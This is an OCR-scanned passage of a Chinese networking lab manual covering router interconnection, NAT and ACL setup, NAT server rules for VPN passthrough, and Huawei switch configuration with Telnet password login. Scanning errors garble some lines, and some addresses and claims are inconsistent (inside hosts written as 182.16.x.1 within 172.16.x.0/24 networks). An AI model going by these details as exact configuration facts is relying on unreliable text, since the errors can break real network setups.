e 找到 【将 当前 配置 参数 保存 至 FLASH £k NVRAM 中 】 的 命令 。 

e 找到 【配置 地 址 转换 】 的 命令 。 


【实验 报告 】 
o 简 述 路 由 器 的 常见 端口 及 作用 。 
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e 简 述 超级 终端 的 作用 及 本 次 实验 的 具体 配置 参数 。 
e 填写 上 面 的 表格 。 


【思考 题 】 
路 由 器 配置 过 程 中 ， 如 果 某 条 命令 需要 删除 ， 如 何 处 理 ? 


2.1.2 多 路 由 器 连接 


【实验 目的 】 
在 实验 中 ， 通 过 正确 配置 ， 建 立 三 台 路 由 器 之 间 的 相互 连接 ， 构 成 一 个 小 型 互联 网 
络 。 要 求 读者 掌握 常见 的 路 由 器 配置 命令 和 网 络 互联 的 基本 原理 。 


【原理 简介 】 

Tess. 用 于 辨别 IP 地 址 中 哪 部 分 为 网 络 地 址 ， 哪 部 分 为 主机 地 址 ， 由 1 和 0 组 
成 ,长 32 位 ， 全 为 1 的 位 代表 网 络 号 。 不 是 所 有 的 网 络 都 需要 子 网 ， 因 此 就 引入 一 个 概 
Bo 默认 子 网 掩 码 (Default Subnet Mask), A 类 IP 地 址 的 默认 子 网 掩 码 为 255.0.0.0; B 类 
的 为 255.255.0.0; C 类 的 为 255.255.255.0。 当 然 ， 还 有 其 他 形式 的 子 网 掩 码 ， 例 如 ， 在 
CHIP 地址 里 边 , 最 后 8 位 是 主机 号 ,可 以 拿 出 高 n 位 作为 子 网 号 ， 而 余下 的 8-n 位 作 
为 主机 号 来 得 到 其 他 形式 的 子 网 掩 码 。 例 如 255.255.255.128(0xFF.FF.FF.80)， 即 最 后 7 
位 为 主机 号 。 

在 一 个 网 段 内 的 主机 之 间 可 以 自由 通信 (只 要 物理 连接 完好 )， 而 不 同 网 段 之 间 的 主 
机 通信 则 要 借助 于 其 他 网 络 设备 ， 路 由 器 或 三 层 交 换 机 。 


【实验 环境 】 

三 台 路 由 器 分 别 命名 为 Router A, Router B 和 Router C. 将 它们 用 交叉 线 (如 图 2-11 
所 示 ) 连接 起 来 。RouterA 和 Router B 的 EO 接口 处 于 192.168.1.0/24 这 个 网 段 ，Router A 
和 Router C 的 El 接口 处 于 192.168.2.0/24 这 个 网 段 。 


Router A 
192.168.1.1 192.168.2.1 
255.255.255.0 = 255.255.255.0 
E0 El 
192.168.1.2 192.168.2.2 
255.255.255.0 | £0 EI | 255.255.255.0 
Router B Router C 


图 2-11 实验 拓扑 图 


【实验 步 又 】 

(1) 按照 图 2-11 的 拓扑 图 将 路 由 器 连接 起 来 。 

(2) 分 别 配置 路 由 器 Router A、Router B 和 Router C。 
以 Router A 为 例 ， 配 置 命令 如 下 : 
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[Router]sysname RouterR // 将 路 由 器 更 名 
[RouterA]interface ethernet 0 // 进 入 接口 配置 模式 
[RouterA-Ethernet0]ip address 192.168.1.1 255.255.255.0 

// 为 接口 配置 IP 地 址 
[RouterA-Ethernet0]undo shut down // 管 理性 打开 接口 
% Interface Ethernet0 is up // 系 统 提 示 E0 接口 开启 
[RouterA-Ethernet0]quit // 退 出 接口 配置 模式 
[RouterA] 


配置 完成 后 可 以 用 display interface ethernetO 来 检查 配置 是 否 正确 。 
可 采用 同样 的 方法 配置 Router B 和 Router C。 需 要 注意 的 是 ，Router B 要 配置 两 个 


接口 E0 和 El。 在 配置 完成 后 ， 要 输入 命令 undo shutdown 将 端口 打开 。Router B 的 EO 
接口 IP 地 址 要 和 Router A 的 在 同一 网 段 。Router C 同 理 。 
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当 配 置 完成 后 查看 接口 信息 ， 检 查 是 否 正 确 。 
(3) 测试 路 由 器 是 否 连接 好 。 
如 果 将 RouterB 的 EO 接口 卫 地 址 配置 为 192.168.1.2， 则 在 Router A 上 输入 : 


[RouterA]ping 192.168.1.2 //Ping RouterB [I] EO 接口 地 址 
若 出 现 如 下 回应 ， 则 说 明 配 置 连 接 成 功 。 


PING 192.168.1.2: 56 data bytes, press CTRL_C to break 


Reply from 192.168.1.2: bytes=56 Sequence-0 tt1-255 time = 2 ms 
Reply from 192.168.1.2: bytes=56 Sequence=1 ttl1-255 time = 2 ms 
Reply from 192.168.1.2: bytes-56 Sequence=2 ttl-255 time = 3 ms 
Reply from 192.168.1.2: bytes-56 Sequence-3 ttl-255 time - 2 ms 
Reply from 192.168.1.2: bytes-56 Sequence-4 ttl-255 time - 2 ms 


---192.168.1.2 ping statistics --- 
5 packets transmitted 
5 packets received 
0.00$ packet loss 
round-trip min/avg/max - 2/2/3 ms 


若 出 现 如 下 回应 ， 则 说 明 配 置 或 连接 有 问题 。 


PING 192.168.1.2: 56 data bytes, press CTRL_C to break 
Request time out 


Request time out 
Request time out 
Request time out 
Request time out 


=--192.166.1.2 ping statistics 一 一 一 
5 packets transmitted 
0 packets received 
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100.00% packet loss 


此 时 ， 应 首先 检查 线 绕 是 否 连 接 正确 。 然 后 用 display 命令 查看 端口 是 否 开 启 ，IP 
地 址 是 否 配 置 正确 。 重 点 检查 有 线 缆 连 接 的 两 接口 的 了 P 地 址 是 不 是 在 同一 网 段 。 
(4) 用 Ping 命令 测试 ， 观 察 从 Router A 到 Router C 是 否 可 以 Ping 通 。 


【实验 报告 】 
写 出 配置 三 台 路 由 器 的 命令 。 


【思考 题 】 
试 说 出 从 一 台 路 由 Ping 其 他 两 台 路 由 是 否 可 以 Ping 通 ， 为 什么 ? 


2.1.3 NAT 的 配置 


【实验 目的 】 
复习 前 面 学 习 的 路 由 器 知识 ， 将 设备 连接 起 来 ， 组 建 简单 网 络 。 并 掌握 网 络 地 址 转 
换 (Network Address Translation，NAT) 的 配置 方法 。 


【原理 简介 】 

网 络 地 址 转换 (NAT)， 是 在 IP 地址 日 益 短缺 的 情况 下 提出 的 。 目 前 ， 由 于 下 地址 
的 长 度 为 32b， 因 此 因特网 地 址 资源 会 随 着 用 户 的 增加 而 耗 尽 。 为 了 解决 因特网 地 址 短 
缺 的 问题 ， 人 们 通常 在 内 部 网 络 设置 像 192.168.1.2 这 样 的 内 部 地 址 。 然 而 ， 此 类 IP 地 
址 在 因特网 上 无 法 识别 。 因 此 ， 必 须 在 网 关上 增加 NAT 转换 功能 ， 将 内 部 网 络 地 址 转换 
成 因特网 可 以 识别 的 因特网 地 址 〈 也 叫 外 网 地 址 )。 

NAT 配置 可 分 为 静态 NAT， 动 态 NAT 以 及 端口 NAT(PAT)。 静 态 NAT 的 作用 就 是 
将 内 部 的 IP 地 址 和 外 部 的 合法 IP 地 址 一 一 对 应 ， 当 内 部 用 户 对 外 访问 时 ， 采 用 所 分 配 
的 外 网 IP 地 址 。 动 态 NAT 采 用 NAT 池 , 动态 地 为 内 部 需要 访问 外 部 的 主机 分 配合 法 的 
IP 地 址 。PAT 就 是 整个 子 网 采用 一 个 卫 地 址 对 外 访问 ， 而 外 部 则 把 这 些 访问 识别 为 来 
EH —^ IP 的 不 同 端口 的 访问 。 

访问 控制 列表 (Access Control List, ACL) 是 路 由 器 的 一 种 访问 控制 机 制 。 当 有 数 
据 经 由 路 由 器 转发 时 ， 它 会 一 条 条 地 对 照 ACL 以 确定 此 次 访问 是 否 合法 。 如 果 合 法 ， 则 
转发 数据 ， 否 则 丢弃 数据 (注意 : 只 有 在 路 由 器 采用 了 NAT 配置 后 ，ACL 才 会 被 访问 ， 
它 也 才 拥 有 对 过 往 数 据 的 控制 权限 。ACL 的 默认 配置 是 禁止 一 切 访问 )。 


【实验 环境 】 

Windows 2000 Server 服务 器 一 台 ，PC 一 台 ， 华 为 Quidway R2811 一 台 。 指 导 教 师 
可 按 实验 要 求 在 服务 器 上 配置 Web 服务 和 一 个 可 以 访问 的 IP 地 址 为 11.0.1.252 的 网 页 。 
实验 拓扑 示意 图 如 图 2-12 所 示 。 

读者 只 需 配 置 路 由 器 。 这 里 的 目的 是 要 让 Host A 可 以 访问 Web 服务 器 上 面 的 网 页 ， 
在 Host A 上 的 浏览 器 中 输入 11.0.1.252 就 可 以 访问 实际 IP 地 址 为 192.168.1.254 的 网 页 ， 
也 就 是 说 ， 通 过 NAT 可 以 达到 安全 隐藏 Web 服务 器 的 目的 。 
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NAT POOL 


11.0.1.251/8 
11.0.1.252/8 
11.0.1.253/8 


E0:11.0.1.254/8 


E1:192.168.1.254/24 


Web Server HostA 
192.168.1.254/24 11.0.1.1/8 


图 2-12 实验 拓扑 图 


【实验 步 又 】 
CD 按照 拓扑 图 连接 好 设备 , 配置 好 路 由 器 接口 地 址 , 不 要 忘 了 加 一 条 从 192.168.1.0 
网 段 到 达 11.0.0.0 网 段 的 静态 路 由 。 
(2) 配置 访问 控制 列表 。 
C 标准 全 访问 控制 列表 。 
一 个 标准 IP 访问 控制 列表 匹配 IP 包 中 的 源 地 址 或 源 地 址 中 的 一 部 分 ， 可 对 匹配 的 
包 采 取 拒 绝 或 允许 两 个 操作 。 编 号 范围 是 1 一 99 的 访问 控制 列表 是 标准 IP 访 问 控 制 列 表 。 
@ 扩展 卫 访问 控制 列表 。 
扩展 IP 访问 控制 列表 比 标准 IP 访问 控制 列表 具有 更 多 的 匹配 项 ， 包 括 协议 类 型 、 
源 地 址 、 目 的 地 址 、 源 端口 、 目 的 端口 、 建 立 的 连接 和 IP 优先 级 等 。 编 号 范围 是 100 一 
199 的 访问 控制 列表 是 扩展 UP 访问 控制 列表 。 
G 命名 的 全 访问 控制 列表 。 
所 谓 命 名 的 IP 访问 控制 列表 是 以 列表 名 代替 列表 编号 来 定义 IP 访问 控制 列表 ， 同 
样 包括 标准 和 扩展 两 种 列表 ， 定 义 过 滤 的 语句 方法 与 编号 方式 相似 。 
其 中 ， 标 准 访问 控制 列表 是 最 简单 的 ACL。 它 的 具体 配置 方法 如 下 : 
o 输入 acl ACL 号 进入 ACL 设置 界面 。 
e rule permit|deny source IP HEHE Jz i F II HERS o 
以 这 次 实验 为 例 , 要 允许 从 HostA 发 过 来 的 数据 包 通过 路 由 器 到 达 Web 服务 器 ， 需 
要 如 下 输入 : 
e [Router]acl 10 NACL 表 号 设 为 10， 所 以 是 标准 ACL 
e [Router-acl-10]rule permit source 11.0.1.0 0.255.255.255 
/指定 允许 来 自 11.0.1.0 网 段 的 数据 包 通 过 。 输 入 后 ， 系 统 提示 : Rule has been 
//added to normal packet-filtering rules 
e [Router-acl-10]quit // 退 出 ACL 配置 模式 
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(3) NAT Pool 的 配置 。 

将 多 个 因特网 地 址 配置 在 路 由 器 的 E0 端口 上 ， 动 态 分 配给 内 部 主机 ， 使 它们 能 
访问 因特网 。 

命令 格式 : 

nat address 起 始 地 址 终止 地 址 nat 池 的 名 字 

以 本 次 实验 为 例 ， 输 入 如 下 : 


[Router]nat address 11.0.1.251 11.0.1.253 RouterA 
// 起 始 地 址 为 11.0.1.251, 终止 地 址 为 11.0.1.253 ,同时 给 nat 池 起 名 为 RouterR 


这 样 就 定义 了 一 个 nat 地 址 池 。 

(4) 将 nat 地 址 池 应 用 在 EO 接口 上 。 

首先 要 进入 接口 配置 模式 ， 然 后 配置 nat 地 址 池 。 

配置 命令 如 下 : 

e [Router]interface ethernetO 

e [Router-EthernetO0]nat outbound 10 add Router A 

/指定 nat 池 用 在 出 口 方向 ， 使 用 ACL 10 并 指定 使 用 nat 池 Router A 

e [Router-Etheret0]quit 

这 样 ， 配 置 就 完成 了 。 

(5) 观察 现象 。 

在 HostA 上 打开 浏览 器 (网 关 要 指定 为 11.0.1.254)， 然 后 输入 “11.0.1.252” 观察 
是 不 是 能 够 看 到 Web 服务 器 上 的 网 页 。 

如 果 有 条 件 , 还 可 以 在 Host A 上 运行 Sniffer, 在 Web 服务 器 上 Ping Host A, 看 Sniffer 
抓 到 的 包 的 原 地 址 是 什么 ， 是 否 可 以 证 明 配 置 成 功 。 

(6) 条 件 允 许 的 情况 下 ， 在 Router 与 Host A 之 间 再 加 一 台 路 由 器 ， 并 做 NAT， 看 
这 时 候 Host A 是 不 是 还 可 以 访问 Web 服务 器 。 

【实验 报告 】 

(1) 要 求 详细 写 出 路 由 器 的 配置 命令 。 

(2) 使 用 以 前 实验 中 讲 过 的 命令 查看 EO 和 El 接口 ， 观 察 有 什么 不 同 。 

G) 条 件 允 许 的 情况 下 ， 可 对 第 (2) 步 截图 。 

【思考 题 】 

路 由 器 是 第 三 层 (网 络 层 ) 交换 设备 ， 根 据 PAT 的 原理 及 实现 ， 请 考虑 它 是 否 仅 涉 
及 网 络 层 的 应 用 与 服务 ? 


2.1.4 VPN 隧道 穿越 设置 


【实验 目的 】 
掌握 路 由 器 的 VPN 隧道 穿越 设置 。 
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【原理 简介 】 
对 路 由 器 进行 NAT 配置 ， 以 实现 VPN 隧道 穿越 的 命令 格式 如 下 : 


nat server [ acl-number ] [ vpn-instance vpn-instance-name ] protocol 
pro-type global ( global-addr [ global-port ] | current-interface | 
interface interface-type interface-number ) inside host-addr [ host-port ] 


e acl-number: 访问 控制 列表 号 ， 范 围 为 2000 一 3999。 当 接收 到 由 内 部 服务 器 向 外 
发 送 的 报 文 时 ， 如 果 报 文 的 源 地 址 和 目的 地 址 是 此 ACL 允许 的 (或 者 对 应 的 
natserver 没有 配置 aalt)， 则 对 报 文 进行 地 址 转换 ， 和 否则 不 进行 地 址 转换 。 

e vpn-instance vpn-instance-name: 内 部 服务 器 所 属 VPN 的 虚拟 路 由 转发 实例 。 如 

果 不 设置 该 值 ,表示 内 部 服务 器 属于 一 个 普通 的 私 网 , 不 属于 某 一 个 MPLS VPN. 

global-addr: 提供 给 外 部 访问 的 IP 地 址 (一 个 合法 的 了 P 地 址 )。 

global-port: 提供 给 外 部 访问 的 服务 的 端口 号 。 若 忽略 ， 将 和 host-port 的 值 一 致 。 

current-interface: 使 用 路 由 器 当前 公 网 接口 的 地 址 NAT Server 的 公 网 地 址 。 

interface interface-type interface-number : 指定 使 用 其 他 接口 的 地 址 作为 

NATServer 的 公 网 地 址 。 目 前 仅 支 持 LoopBack 接口 ， 且 必须 在 路 由 器 中 配置 。 

host-addr: 服务 器 在 内 部 局 域 网 的 IP 地 址 。 

e host-port: 服务 器 提供 的 服务 端口 号 ， 范 围 为 0 一 65 535， 常 用 的 端口 号 可 以 用 关 
键 字 代替 。 如 WWW 服务 端口 为 80， 同 时 可 以 使 用 www 代替 。FTP 服务 端口 
号 为 21， 同 时 可 以 使 用 fp 代替。 如 果 为 零 ， 表 示 任 何 类 型 的 服务 都 提供 ， 可 以 
用 any 关键 字 代替 。 如 果 没 有 配置 这 个 参数 ， 则 表示 是 any 的 情况 ， 相 当 于 
global-addr 和 host-addr 之 间 有 一 个 静态 的 连接 。 当 host-port 是 any 时 ,global-port 
也 必须 是 any， 否 则 是 非法 配置 。 

e 可 用 global-port1、global-port2: 通过 两 个 端口 指定 一 个 端口 范围 ,并 与 内 部 主机 
的 地 址 范围 构成 一 种 对 应 关系 。global-port2 必须 大 于 global-port!. 

e 同上 可 通过 host-addrl. host-addr2: 定义 一 组 连续 的 地 址 范围 ， 和 前 面 定义 的 端 

口 范围 构成 一 一 对 应 的 关系 。hostraddr2 必须 大 于 host-addr1。 该 地 址 范围 的 数 

量 必须 和 global-port1、global-port2 定义 的 端口 数量 相同 。 

e pro-type: 表示 IP 协议 承载 的 协议 类 型 ， 可 以 使 用 协议 号 ， 也 可 用 关键 字 代 替 。 

如 ICMP〔 协 议 号 为 1 )、TCP (协议 号 为 6)、UDP (协议 号 为 17)。 


【实验 环境 】 
网 络 1、 网 络 2 和 网 络 3 中 任意 两 个 网 络 之 间 实 现 VPN 连接 。 对 网 络 1 和 网 络 2 的 


路 由 器 进行 设置 使 VPNI 和 VPN2 之 间 的 IPSEC 包 能 够 穿越 相应 的 路 由 器 设备 (如 
图 2-13 所 示 )。 
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【实验 步骤 】 
网 络 1 的 路 由 器 设置 : 


22% 网 络 设备 配置 与 使 用 mem 


219.224.161.147 219.224.161.146 219.224.161.145 


网 络 1:172.16.1.0/24 网 络 2:172.16.2.0/24 网 络 3:172.16.3.0/24 
图 2-13 实验 拓扑 图 


nat server protocol tcp global 219.224.161.147 any inside 182.16.1.1 any 
nat server protocol udp global 219.224.161.147 any inside 182.16.1.1 any 


网 络 2 的 路 由 器 设置 : 


nat server protocol tcp global 219.224.161.146 any inside 182.16.2.1 any 
nat server protocol udp global 219.224.161.146 any inside 182.16.2.1 any 


【实验 报告 】 
结合 VPN 的 硬件 设置 ， 比 较 设 置 前 和 设置 后 VPN 连接 的 状态 。 


【思考 题 】 
根据 VPN 所 采用 的 协议 ， 思 考 为 什么 要 添加 UDP. TCP 穿越 ? 


22 _ 交换机 


2.2.1 交换 机 配置 


【实验 目的 】 

(1) 掌握 二 /三 层 交 换 机 的 使 用 。 

(2) 掌握 二 /三 层 交 换 机 的 配置 。 

(3) 掌握 二 /三 层 交 换 机 的 信息 查阅 。 

【原理 简介 】 

交换 机 (Switch): 目前 比较 常见 的 多 为 二 层 交 换 机 ， 即 工作 在 OSI 参考 模型 第 二 层 
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(数据 链 路 层 ) 的 设备 。 它 根据 数据 帧 中 的 MAC 地 址 进行 转发 ， 并 将 这 些 MAC 地 址 与 

其 对 应 的 端口 记录 在 内 部 数据 库 中 。 

作为 第 二 层 设备 ， 交 换 机 有 以 下 几 个 显著 优势 。 

e 交换 机 不 对 数据 进行 更 多 的 拆 解 ， 因 此 交换 效率 高 。 

e 采用 交换 式 局 域 网 技术 ， 使 专用 带宽 被 用 户 独 享 ， 极 大 地 提高 了 传输 效率 。 

e 它 的 快速 交换 功能 、 多 个 接 入 接口 以 及 低廉 的 价格 ， 成 为 小 型 网 络 解决 方案 的 
选择 。 

e 交换 机 分 隔 了 冲突 域 。 

二 层 交 换 技 术 目 前 已 经 非常 成 熟 。 交 换 机 一 般 都 含有 专用 于 数据 包 转 发 的 ASIC 芯 

因此 它 的 转发 速度 非常 快 ， 各 种 接口 模块 都 能 以 高 达 几 十 Gb/s 的 速率 交换 数据 。 

三 层 交 换 机 就 是 有 部 分 路 由 器 功能 的 交换 机 。 三 层 交 换 机 的 最 重要 目的 是 加 快 大 型 

局 域 网 内 部 的 数据 交换 , 所 具有 的 路 由 功能 也 是 为 这 一 目的 服务 的 , 能 够 做 到 一 次 路 由 ， 

多 次 转发 。 对 于 数据 包 转 发 等 规律 性 的 过 程 由 硬件 高 速 实现 ， 而 像 路 由 信息 更 新 、 路 由 

表 维 护 、 路 由 计算 、 路 由 确定 等 功能 ， 由 软件 实现 。 

出 于 安全 和 管理 方便 的 考虑 ， 为 了 减 小 广播 风暴 的 危害 ， 必 须 把 大 型 局 域 网 按 功 能 
或 地 域 等 因素 划分 成 一 个 个 小 的 局 域 网 ， 这 就 使 VLAN 技术 在 网 络 中 得 以 大 量 应 用 ， 而 
各 个 不 同 VLAN 间 的 通信 都 要 经 过 路 由 器 来 完成 转发 。 随 着 网 间 互 访 的 不 断 增加 ， 当 单 
纯 使 用 路 由 器 来 实现 网 间 访 问 时 ， 由 于 端口 数量 有 限 ， 路 由 速度 较 慢 ， 限 制 了 网 络 的 规 
模 和 访问 速度 。 因 此 ， 三 层 交 换 机 便 应 运 而 生 。 三 层 交 换 机 是 为 IP 设计 的 ， 接 口 类 型 简 
单 ， 拥 有 很 强 的 二 层 包 处 理 能 力 ， 非 常 适用 于 大 型 局 域 网 内 的 数据 路 由 与 交换 ， 它 既 可 
以 工作 在 协议 第 三 层 蔡 代 或 部 分 完成 传统 路 由 器 的 功能 , 同时 又 具有 第 二 层 交 换 的 速度 ， 
且 价 格 相 对 便宜 。 

在 企业 网 和 教学 网 中 ， 一 般 会 将 三 层 交 换 机 用 在 网 络 的 核心 层 ， 用 三 层 交 换 机 上 的 
千 兆 端口 或 百 兆 端 口 连接 不 同 的 子 网 或 VLAN。 不 过 应 清醒 认识 到 三 层 交 换 机 出 现 最 重 
要 的 目的 是 加 快 大 型 局 域 网 内 部 的 数据 交换 ， 所 具备 的 路 由 功能 也 多 是 围绕 这 一 目的 而 
展开 的 ， 所 以 它 的 路 由 功能 没有 同一 档次 的 专业 路 由 器 强 。 毕 竟 在 安全 、 协 议 支持 等 方 
面 还 有 许多 欠缺 ， 并 不 能 完全 取代 路 由 器 工作 。 

交换 机 转发 数据 的 过 程 如 下 。 

交换 机 会 在 内 部 建立 并 维护 一 张 用 于 记录 MAC 和 自身 端口 映射 关系 的 表 。 通 过 这 
张 表 ， 交 换 机 可 以 快速 地 建立 内 部 通道 ， 达 到 快速 转发 的 目的 。 

a) 当 交 换 机 从 自身 的 某 个 端口 接收 到 一 个 数据 帧 时 ， 它 会 记录 下 这 个 帧 的 源 
MAC 地 址 ， 并 与 这 个 端口 建立 映射 关系 。 

(2) 读 取 帧 中 的 目的 MAC 地 址 ， 并 在 映射 表 中 查找 相应 的 端口 。 

(GO 如 果 有 关于 目的 MAC 地 址 与 端口 的 映射 ， 那 么 把 数据 包 复制 到 目的 端口 。 

(4) 如 果 没 有 相应 的 映射 关系 ， 那 么 交换 机 将 把 数据 包 广 播 到 所 有 端口 。 当 目的 主 
机 回应 时 ， 交 换 机 将 建立 新 的 映射 关系 ， 下 一 次 的 转发 就 不 需要 广播 了 。 

(5) 这 种 学 习 过 程 将 不 断 持 续 ， 直 到 交换 机 的 所 有 端口 与 MAC 的 映射 关系 完成 。 
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如 果 主 机 的 MAC 发生 变化， 那么 将 对 变化 的 端口 做 重新 的 映射 学 习 。 

下 面 一 组 图 就 是 交换 机 第 一 次 启动 时 的 学 习 过 程 。 

首次 启动 端口 1 要 向 端口 2 的 MAC 地 址 主机 发 送信 息 ( 如 图 2-14 所 示 )， 但 是 交 
换 机 此 时 还 没有 映射 关系 ， 所 以 将 数据 帧 广播 到 所 有 端口 。 


内 部 数字 总 线 


图 2-14 端口 1 第 一 次 向 端口 2 发 送信 息 


端口 2 做 出 回应 (如 图 2-15 所 示 )， 端 口 1 在 上 一 步 已 做 了 映射 ， 所 以 数据 直接 发 
送 给 端口 1。 这 一 次 端口 2 也 做 了 映射 。 


内 部 数字 总 线 


图 2-15 端口 2 向 端口 1 发 送 一 个 帧 


在 接 下 来 的 通信 过 程 中 ， 由 于 这 两 个 端口 与 主机 的 MAC 已 做 了 映射 ， 所 以 可 以 直 
接 进行 通信 ， 如 图 2-16 所 示 。 


内 部 数字 总 线 


d | a 
端口 1( 发 送 ) 端口 5 
端口 (接收 ) 16 


端口 3 


图 2-16 在 已 知 MAC/PORT 后 的 帧 路 径 
本 章 以 华为 交换 机 为 例 ， 来 演示 交换 机 的 配置 与 工作 过 程 。 
本 实验 所 使 用 的 是 华为 Quidway LS-3928TP-SI 交换 机 ， 如 图 2-17 所 示 。 
可 以 看 到 此 交换 机 前 面板 上 有 24 个 10/100Base-TX 自 适应 的 以 太 网 接口 , 还 有 两 个 
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10/100 1000 10/100/1000 Console 
Base-TX Base-X Base-T 


图 2-17 Quidway LS-3928TP-SI 正视 图 


1000Base-X 的 光 接 口 、 两 个 10/100/1000Base-T 的 RJ-45 接口 以 及 Console 控制 接口 。 

下 面 介 绍 一 下 这 些 接口 的 作用 。 

(1) 10/100Base-TX 端口 : 使 用 RJ-45 水 蝇头 和 双 绞 线 的 以 太 网 接口 ， 符 合 IEEE 
802.3u 标准 ， 支 持 10M 半 双 工 /全 双 工 ，100M 半 双 工 / 全 双 工 。 

(2) 1000Base-X 端口 : 此 端口 为 千 兆 以 太 网 接口 ， 可 以 连接 千 兆 的 光纤 模块 。 

(3) 10/100/1000Base-T 端口 : 为 自 适 应 RJ-45 接口 ， 可 以 连接 百 兆 和 千 兆 双 绞 线 。 

(4) Console (CON) 端口 : Console 端口 使 用 配置 专用 连 线 直 接连 接 计 算 机 的 串口 ， 
利用 终端 仿真 程序 (如 Windows 的 “超级 终端 ”) 进行 交换 机 配置 。 交 换 机 的 Console 
端口 多 为 RJ-45 接口 ， 如 果 Console 端口 为 RJ-45 接口 ， 请 直接 采用 直通 线 连接 至 一 台 
PC 的 串口 。 此 时 ， 在 PC 的 串口 上 要 安装 一 个 串口 /RJ-45 转换 器 。 

当然 ， 如 果 读 者 感 兴趣 ， 可 以 自己 查找 资料 深入 了 解 这 些 接口 的 作用 。 


【实验 环境 】 
Quidway LS-3928TP-SI 以 太 网 交换 机 一 台 ，PC 主机 一 台 ， 如 图 2-18 所 示 。 


【实验 步骤 】 网 线 

交换 机 提供 如 下 三 种 配置 管理 方法 。 

(1) 通过 Console 口 进 行 配置 管理 。 交汇 机 

(2) 通过 Telnet 进行 本 地 的 或 远程 管理 。 申 口 /(RJ-45 转 换 器 

(3) 熟悉 常用 的 几 个 系统 配置 和 维护 命令 。 Be CX 

下 面 将 依次 讨论 如 何 通 过 上 述 几 种 方法 完 图 2.18 es 
成 Quidway S 系列 交换 机 的 人 机 交互 工作 。 

1. Console 端口 配置 管理 

交换 机 Console 端口 的 连接 和 超级 终端 的 配置 与 路 由 器 的 配置 相同 , 这 里 不 再 袭 述 。 

2. Telnet 配置 管理 

Telnet 配置 管理 方法 是 网 络 工程 师 或 网 络 管理 员 使 用 最 广泛 的 一 种 设备 访问 控制 方 
式 。 它 通过 局 域 网 或 广域网 实现 本 地 或 远程 的 访问 控制 。 但 是 它 的 使 用 必须 要 求 首先 对 
设备 进行 初始 化 配置 ， 否 则 用 户 无 法 正确 登录 和 访问 。 初 始 化 配置 只 能 通过 Console 端 
口 登录 进行 配置 。 

若 管 理 员 和 网 络 工程 师 想 访问 某 交换 机 ， 他 必须 能 够 确定 被 访问 的 交换 机 。 当 今 网 
络 都 是 使 用 IP 地 址 来 标识 网 络 设备 , 所 以 进行 Telnet 配置 管理 的 前 提 是 交换 机 必须 具有 
唯一 的 卫 地 址 。 


PC 
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CD 配置 交换 机 的 管理 JP 地址 。 


[Quidway] interface Vlan-interface 1 
[Quidway-Vlan-interfacel] ip address 10.0.0.1 255.0.0.0 


此 时 请 配置 实验 主机 的 IP 地 址 与 Vlan-interfacel 处 于 同一 网 段 ， 然 后 使 用 Windows 
附带 的 Telnet 终端 软件 访问 10.0.0.1， 会 出 现 提示 “Login password has not been set! ".. 3X 
是 因为 Quidway S 系列 交换 机 为 了 保证 网 络 设备 的 安全 而 实现 的 , 即 默认 情况 下 ，Telnet 
登录 用 户 需要 认证 。 所 以 在 使 用 Telnet 之 前 必须 设置 登录 认证 ， 否 则 禁止 登录 。 

(2) 配置 Telnet 用 户 认 证 。 

同 Console 端口 登录 用 户 一 样 ，Telnet 登录 用 户 也 有 三 种 认证 方式 , 并 且 它 们 的 认证 
方式 也 一 样 。 在 此 先 以 本 地 口令 认证 为 例 ， 请 执行 如 下 配置 命令 : 


[Quidway]user-interface vty 0 4 
[Quidway-ui-vtyO-4]authentication-mode password 
[Quidway-ui-vtyO-4]set authentication password simple huawei 


(3) 完成 配置 后 再 次 使 用 Telnet 终端 登录 10.0.0.1， 按 照 交换 机 提示 输入 password: 
huawei， 即 可 进入 用 户 视图 。 此 时 可 以 看 看 当前 用 户 命令 控制 的 级 别 是 什么 。 

3. Quidway S 系列 以 太 网 交换 机 常用 配置 命令 

网 络 工程 师 和 设备 管理 员 在 配置 网 络 设备 过 程 中 ， 往 往 需要 查看 设备 配置 信息 ， 删 
除 配置 或 者 重新 启动 设备 ， 等 等 。 在 此 介绍 几 个 常用 的 公用 命令 ， 以 便 读 者 在 后 面 的 实 
验 过 程 中 能 够 避免 一 些 不 必要 的 麻烦 。 

1) 查看 当前 配置 

设备 是 否 正常 运行 ， 决 定 与 当前 的 配置 是 否 正确 ， 所 以 在 设备 配置 过 程 中 和 故障 排 
除 中 ， 查 看 当前 配置 是 必 不 可 少 的 操作 之 一 。 

<Quidway>display current-configuration 

2) 保存 当前 设备 配置 

当前 设备 配置 运行 于 设备 的 内 存 中 ， 如 果 设 备 重启 ， 系 统 将 从 Flash 中 读 取 配置 数 
据 进行 网 络 设备 的 初始 化 。 所 以 ， 为 了 保证 网 络 设备 在 重新 启动 之 后 仍 能 够 正常 工作 。 
完成 配置 之 后 一 定 要 将 当前 配置 保存 到 Flash 存储 器 中 。 


<Quidway>save 


3) fif Flash 中 的 配置 信息 
为 了 肯定 当前 配置 和 Flash 中 的 配置 信息 完全 一 致 , 还 常常 需要 查看 Flash 中 的 配置 
信息 。 


<Quidway>display saved-configuration 


4) 清除 Flash 中 的 配置 信息 
为 了 防止 设备 原始 配置 的 影响 ， 在 进行 网 络 设 备 配 置 或 实验 之 前 ， 需 要 清除 当前 配 
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置 , 但 是 如 果 Flash 中 存在 以 前 的 配置 信息 ,设备 启动 后 的 当前 配置 就 和 Flash 中 的 配置 


一 样 。 一 般 而 言 ， 认 为 使 用 配置 命令 进行 业务 取消 耗 时 费力 ，Quidway S 系列 以 太 网 交 
换 机 能 够 通过 擦 除 Flash 中 的 配置 信息 后 重启 设备 达到 清除 配置 信息 的 目的 。 


<Quidway>reset saved-configuration 


5) 重启 交换 机 
在 前 面 的 配置 命令 介绍 中 已 经 提 到 过 清除 配置 信息 时 ， 需 要 重新 启动 网 络 设备 ， 其 
， 在 某 些 时 候 为 了 让 某 些 修改 后 的 配置 信息 生效 ， 也 需要 重启 交换 机 。 


<Quidway>reboot 


6) 显示 系统 软件 版 本 

在 网 络 飞 速 发 展 的 今天 ， 网 络 设备 系统 的 更 新 、 升 级 成 为 必然 。 在 进行 设备 配置 和 
故障 诊断 时 ， 检 查 系 统 软件 版 本 也 是 排除 故障 的 重要 信息 之 一 。 通 过 下 面 的 配置 命令 可 
以 看 到 系统 的 详细 版 本 信息 ， 以 提供 有 效 参考 。 


<Quidway>display version 


将 


【实验 报告 】 

(1) 使 用 上 述 的 display 命令 ， 记 录 Flash 信息 和 版 本 信息 。 

(2) 记录 所 使 用 交换 机 的 特征 。 

【思考 题 】 

在 一 个 用 交换 机 组 建 的 网 络 里 ， 利 用 其 中 一 台 PC 上 的 抓 包 软件 ， 抓 到 的 数据 包 的 
目的 地 址 是 什么 ? 


